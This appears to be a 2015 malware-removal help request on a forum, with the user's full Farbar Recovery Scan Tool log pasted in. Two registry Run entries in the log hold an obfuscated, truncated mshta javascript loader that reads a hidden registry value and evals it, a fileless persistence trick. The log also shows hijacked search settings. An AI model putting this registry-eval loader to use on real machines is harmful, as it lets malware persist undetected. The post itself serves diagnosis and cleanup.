Hi there
I was hoping for some help in removing malware. Avast has been pinging like mad since this morning. Avast doesn’t seem to remove it even when I run a system scan.
I have run a Farbar Recovery Scan Tool test, as recommended elsewhere on the forum. I’ve pasted the results below in the hope that someone might be able to help with eradicating the problem. Thanks in advance for any suggestions.
FRST.txt
Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 21-06-2015 01
Ran by home (administrator) on HOME-PC on 22-06-2015 11:49:14
Running from C:\Users\home\Desktop
Loaded Profiles: home (Available Profiles: home & Remote)
Platform: Microsoft Windows 7 Professional Service Pack 1 (X86) OS Language: English (United States)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
() C:\Program Files\Web Connection\Y855_EE\BackgroundService\ServiceManager.exe
(LogMeIn, Inc.) C:\Program Files\LogMeIn\x86\LMIGuardianSvc.exe
(DEVGURU Co., LTD.) C:\Program Files\SAMSUNG\USB Drivers\25_escape\conn\ss_conn_service.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Adobe Systems Incorporated) C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(LogMeIn, Inc.) C:\Program Files\LogMeIn\x86\LogMeInSystray.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Oracle Corporation) C:\Program Files\Common Files\Java\Java Update\jusched.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\avastui.exe
() C:\Program Files\VTech\DownloadManager\System\AgentMonitor.exe
(FTR Pty. Ltd.) C:\Program Files\FTR\ForTheRecord\FTRSearchFolders.exe
() C:\Program Files\Web Connection\Y855_EE\BackgroundService\ModemListener.exe
(Microsoft Corporation) C:\Windows\WindowsMobile\wmdcBase.exe
(TomTom) C:\Program Files\MyDrive Connect\TomTom MyDrive Connect.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner.exe
(NCH Software) C:\Program Files\NCH Software\Scribe\scribe.exe
(Microsoft Corporation) C:\Windows\System32\wbem\unsecapp.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE
(Microsoft Corporation) C:\Program Files\Microsoft Office\OFFICE11\EXCEL.EXE
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Adobe Systems Incorporated) C:\Windows\System32\Macromed\Flash\FlashUtil32_14_0_0_125_ActiveX.exe
(Microsoft Corporation) C:\Windows\System32\wuauclt.exe
(FileZilla Project) C:\Users\home\Downloads\FileZilla_3.7.1_win32\FileZilla-3.7.1\filezilla.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
==================== Registry (Whitelisted) ==================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM.…\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [946352 2012-12-03] (Adobe Systems Incorporated)
HKLM.…\Run: [LogMeIn GUI] => C:\Program Files\LogMeIn\x86\LogMeInSystray.exe [63048 2013-04-30] (LogMeIn, Inc.)
HKLM.…\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [254336 2013-07-02] (Oracle Corporation)
HKLM.…\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [5227648 2015-03-30] (AVAST Software)
HKLM.…\Run: [AgentMonitor] => C:\Program Files\VTech\DownloadManager\System\AgentMonitor.exe [391040 2014-04-17] ()
HKLM.…\Run: [FTR Search Folders] => C:\Program Files\FTR\ForTheRecord\FTRSearchFolders.exe [94208 2012-12-06] (FTR Pty. Ltd.)
HKLM.…\Run: [MSRS] => C:\Program Files\NCH Software\MSRS\msrs.exe [1067524 2014-12-11] (NCH Software)
HKLM.…\Run: [EE MORPHO ModemListener] => C:\Program Files\Web Connection\Y855_EE\BackgroundService\ModemListener.exe [159056 2014-05-16] ()
HKLM.…\Run: [Windows Mobile-based device management] => C:\Windows\WindowsMobile\wmdcBase.exe [648072 2007-05-31] (Microsoft Corporation)
HKLM.…\Run: [**ae5247d6<>] => mshta javascript:qF3FqNEcm=“zX6biHBz2U”;P3Y=new%20ActiveXObject(“WScript.Shell”);AD9hXrw=“1EafLBrD”;cvk4J6=P3Y.RegRead(“HKLM\software\ae8c3fee\6fecae9c”);m1t9pCUD=“71P5TNR”;eval(cvk4J6);C2BueEz3="6 (the data entry has 7 more characters). <===== ATTENTION (Value Name with invalid characters)
HKLM.…\Policies\Explorer\Run: [] =>
HKU\S-1-5-21-1304999761-2293218496-246315724-1000.…\Run: [MyDriveConnect.exe] => C:\Program Files\MyDrive Connect\TomTom MyDrive Connect.exe [1905032 2015-04-28] (TomTom)
HKU\S-1-5-21-1304999761-2293218496-246315724-1000.…\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner.exe [5503768 2015-02-19] (Piriform Ltd)
HKU\S-1-5-21-1304999761-2293218496-246315724-1000.…\MountPoints2: {48b0afcb-e586-11e3-9bdf-001e4fd3631b} - F:\InnoTabSetup.exe
HKU\S-1-5-21-1304999761-2293218496-246315724-1000.…\MountPoints2: {eae30f1f-a85c-11e4-b8fc-001e4fd3631b} - F:\autorun.exe
HKU\S-1-5-18.…\Run: [**ae5247d6<>] => mshta javascript:x6kvoQz4=“rLhTIzQy”;v2N=new%20ActiveXObject(“WScript.Shell”);FFfUbEV5=“VuLd”;u4z7kO=v2N.RegRead(“HKCU\software\ae8c3fee\6fecae9c”);hgRf2bBNH=“s7Vqtqu05i”;eval(u4z7kO);YB7XtxSd="CxK (the data entry has 2 more characters). <===== ATTENTION (Value Name with invalid characters)
HKLM.…\AppCertDlls: [x64] → c:\program files\settings manager\smdmf\x64\sysapcrt.dll
ShellIconOverlayIdentifiers: [00avast] → {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2014-12-31] (AVAST Software)
CHR HKU\S-1-5-21-1304999761-2293218496-246315724-1000\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
HKU\S-1-5-21-1304999761-2293218496-246315724-1000\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.co.uk/
HKU\S-1-5-21-1304999761-2293218496-246315724-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://uk.msn.com/?ocid=iehp
SearchScopes: HKLM → {9BB47C17-9C68-4BB3-B188-DD9AF0FD2492} URL = http://www.default-search.net/search?sid=492&aid=345&itype=a&ver=15005&tm=577&src=ds&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1304999761-2293218496-246315724-1000 → {9BB47C17-9C68-4BB3-B188-DD9AF0FD2492} URL = http://www.default-search.net/search?sid=492&aid=345&itype=a&ver=15005&tm=577&src=ds&p={searchTerms}
BHO: Adobe PDF Link Helper → {18DF081C-E8AD-4283-A596-FA578C2EBDC3} → C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2012-12-18] (Adobe Systems Incorporated)
BHO: Java™ Plug-In SSV Helper → {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} → C:\Program Files\Java\jre7\bin\ssv.dll [2013-10-08] (Oracle Corporation)
BHO: avast! Online Security → {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} → C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2014-12-31] (AVAST Software)
BHO: Java™ Plug-In 2 SSV Helper → {DBC80044-A445-435b-BC74-9C25C1C588A9} → C:\Program Files\Java\jre7\bin\jp2ssv.dll [2013-10-08] (Oracle Corporation)
Toolbar: HKU\S-1-5-21-1304999761-2293218496-246315724-1000 → No Name - {D4027C7F-154A-4066-A1AD-4243D8127440} - No File
DPF: {1ABA5FAC-1417-422B-BA82-45C35E2C908B} http://kitchenplanner.ikea.com/JP/Core/Player/2020PlayerAX_IKEA_Win32.cab
DPF: {8A5BE387-D09A-4DFA-A56B-DCB89BD11468} https://spaces.diy.com/2020Spaces_main/UI/idealSpaces/AE/AppEngine/RoomEngine/Core/Player/2020PlayerAX_WEB_Win32.cab
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
FireFox:
FF ProfilePath: C:\Users\home\AppData\Roaming\Mozilla\Firefox\Profiles\jfl11v1b.default
FF NewTab: about:newtab
FF DefaultSearchEngine: Google (avast)
FF DefaultSearchUrl: https://www.google.com/search/?trackid=sp-006
FF SearchEngineOrder.1: Google (avast)
FF SelectedSearchEngine: Google (avast)
FF Homepage: https://www.google.com/?trackid=sp-006
FF Keyword.URL: https://www.google.com/search/?trackid=sp-006
FF Plugin: @adobe.com/FlashPlayer → C:\Windows\system32\Macromed\Flash\NPSWF32_11_4_402_265.dll [2012-09-01] ()
FF Plugin: @java.com/DTPlugin,version=10.45.2 → C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll [2013-10-08] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.45.2 → C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll [2013-10-08] (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE → disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 → c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-13] ( Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 → C:\Program Files\Google\Update\1.3.27.5\npGoogleUpdate3.dll [2015-05-19] (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 → C:\Program Files\Google\Update\1.3.27.5\npGoogleUpdate3.dll [2015-05-19] (Google Inc.)
FF Plugin: Adobe Reader → C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll [2013-02-15] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppdf32.dll [2013-02-15] (Adobe Systems Inc.)
FF SearchPlugin: C:\Users\home\AppData\Roaming\Mozilla\Firefox\Profiles\jfl11v1b.default\searchplugins\askcom.xml [2013-03-04]
FF SearchPlugin: C:\Users\home\AppData\Roaming\Mozilla\Firefox\Profiles\jfl11v1b.default\searchplugins\default-search.xml [2014-12-30]
FF SearchPlugin: C:\Users\home\AppData\Roaming\Mozilla\Firefox\Profiles\jfl11v1b.default\searchplugins\google-avast.xml [2015-02-22]
FF SearchPlugin: C:\Program Files\mozilla firefox\searchplugins\default-search.xml [2014-12-30]
FF HKLM.…\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Extension: Avast Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2013-12-06]
Chrome:
CHR Plugin: (Shockwave Flash) - C:\Program Files\Google\Chrome\Application\40.0.2214.115\PepperFlash\pepflashplayer.dll No File
CHR Plugin: (Shockwave Flash) - C:\Windows\system32\Macromed\Flash\NPSWF32_11_4_402_265.dll ()
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files\Google\Chrome\Application\40.0.2214.115\ppGoogleNaClPluginChrome.dll No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files\Google\Chrome\Application\40.0.2214.115\pdf.dll No File
CHR Plugin: (Adobe Acrobat) - C:\Program Files\Adobe\Reader 10.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (Google Update) - C:\Program Files\Google\Update\1.3.21.123\npGoogleUpdate3.dll No File
CHR Plugin: (Java™ Platform SE 7 U9) - C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
CHR Plugin: (Java Deployment Toolkit 7.0.70.10) - C:\Windows\system32\npDeployJava1.dll No File
CHR Profile: C:\Users\home\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\home\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-11-27]
CHR Extension: (Google Cast) - C:\Users\home\AppData\Local\Google\Chrome\User Data\Default\Extensions\boadgeojelhgndaghljhdicfkmllpafd [2014-11-27]
CHR Extension: (Avast Online Security) - C:\Users\home\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2014-09-08]
CHR Extension: (Google Wallet) - C:\Users\home\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-10-10]
CHR HKLM.…\Chrome\Extension: [fgbcffenncokfocljomejddmgcpppjom] - https://clients2.google.com/service/update2/crx
CHR HKLM.…\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx [2014-12-31]
========================== Services (Whitelisted) =================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [50344 2014-12-31] (AVAST Software)
R2 EE MORPHO Modem Device Helper; C:\Program Files\Web Connection\Y855_EE\BackgroundService\ServiceManager.exe [58192 2013-06-18] ()
S2 MSRSService; C:\Program Files\NCH Software\MSRS\msrs.exe [1067524 2014-12-11] (NCH Software) [File not signed]
R2 ss_conn_service; C:\Program Files\Samsung\USB Drivers\25_escape\conn\ss_conn_service.exe [743688 2014-10-13] (DEVGURU Co., LTD.)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [680960 2009-07-14] (Microsoft Corporation)
==================== Drivers (Whitelisted) ====================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [24184 2014-12-31] ()
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [70384 2014-12-31] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [81768 2014-12-31] (AVAST Software)
R0 aswRvrt; C:\Windows\system32\Drivers\aswRvrt.sys [49944 2014-12-31] ()
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [787800 2014-12-31] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [423784 2014-12-31] (AVAST Software)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [91496 2014-12-31] (AVAST Software)
R0 aswVmm; C:\Windows\system32\Drivers\aswVmm.sys [206248 2014-12-31] ()
R2 DgiVecp; C:\Windows\system32\Drivers\DgiVecp.sys [38400 2009-06-09] (Samsung Electronics Co., Ltd.) [File not signed]
S4 DNE; C:\Windows\System32\DRIVERS\dne2000.sys [131984 2008-11-16] (Deterministic Networks, Inc.)
R3 e1express; C:\Windows\System32\DRIVERS\e1e6232.sys [219352 2009-06-05] (Intel Corporation)
R2 SSPORT; C:\Windows\system32\Drivers\SSPORT.sys [5120 2008-01-10] (Samsung Electronics) [File not signed]
S4 LMIRfsClientNP; No ImagePath
S3 SWVNIC; system32\DRIVERS\swvnic.sys
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One Month Created files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2015-06-22 11:28 - 2015-06-22 11:29 - 00034577 _____ C:\Users\home\Desktop\Addition.txt
2015-06-22 11:27 - 2015-06-22 11:49 - 00014309 _____ C:\Users\home\Desktop\FRST.txt
2015-06-22 11:27 - 2015-06-22 11:49 - 00000000 ____D C:\FRST
2015-06-22 11:26 - 2015-06-22 11:26 - 01148928 _____ (Farbar) C:\Users\home\Desktop\FRST.exe
2015-06-19 08:55 - 2015-06-19 08:55 - 00000396 _____ C:\Windows\PFRO.log
2015-05-31 17:06 - 2015-05-31 17:06 - 00000000 ____D C:\Users\home\Desktop\Enforcement of right of way
==================== One Month Modified files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2015-06-22 11:43 - 2013-06-25 17:39 - 00000000 ____D C:\Users\home\Documents*** work
2015-06-22 11:11 - 2012-11-06 11:42 - 00000886 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2015-06-22 11:03 - 2009-07-14 05:34 - 00020720 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-06-22 11:03 - 2009-07-14 05:34 - 00020720 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-06-22 11:00 - 2012-09-09 23:34 - 00000000 ____D C:\Users\home\AppData\Roaming\FileZilla
2015-06-22 10:59 - 2012-08-20 20:43 - 01277635 _____ C:\Windows\WindowsUpdate.log
2015-06-22 10:56 - 2015-03-09 10:21 - 00019408 _____ C:\Windows\setupact.log
2015-06-22 10:56 - 2012-11-06 11:42 - 00000882 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-06-22 10:56 - 2009-07-14 05:53 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2015-06-20 18:23 - 2015-03-16 10:50 - 00000000 ____D C:\Users\home\Documents*l
2015-06-20 16:28 - 2012-09-09 23:07 - 00000000 ____D C:\Users\home\Documents\My docs
2015-06-20 14:04 - 2013-05-03 16:54 - 00000000 ____D C:\Users\home\Documents\Scanned docs
2015-06-19 12:32 - 2015-04-23 12:10 - 00000000 ____D C:\Users\home\Documents* LLP
2015-06-06 17:31 - 2009-07-14 05:52 - 00000000 ____D C:\Windows\system32\FxsTmp
2015-06-05 17:33 - 2012-10-24 16:20 - 00000000 ____D C:\Users\home\Documents***
2015-06-05 12:48 - 2015-03-16 11:56 - 00000000 ____D C:\Users\home\Documents***
2015-05-27 16:59 - 2012-08-20 20:48 - 00726316 _____ C:\Windows\system32\PerfStringBackup.INI
==================== Files in the root of some directories =======
2012-08-20 21:01 - 2012-08-20 21:01 - 0000040 _____ () C:\Users\home\AppData\Roaming\burnaware.ini
2014-05-27 11:09 - 2014-05-27 11:11 - 0000581 _____ () C:\Users\home\AppData\Local\cookies.ini
2013-05-03 16:44 - 2013-05-03 16:44 - 0000057 _____ () C:\ProgramData\Ament.ini
2012-08-20 21:47 - 2012-08-20 21:47 - 0001534 _____ () C:\ProgramData\ss.ini
Files to move or delete:
C:\Users\home\CTX.DAT
Some files in TEMP:
C:\Users\Remote\AppData\Local\Temp\AskSLib.dll
==================== Bamital & volsnap Check =================
(There is no automatic fix for files that do not pass verification.)
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
LastRegBack: 2015-06-15 08:26
==================== End of log ============================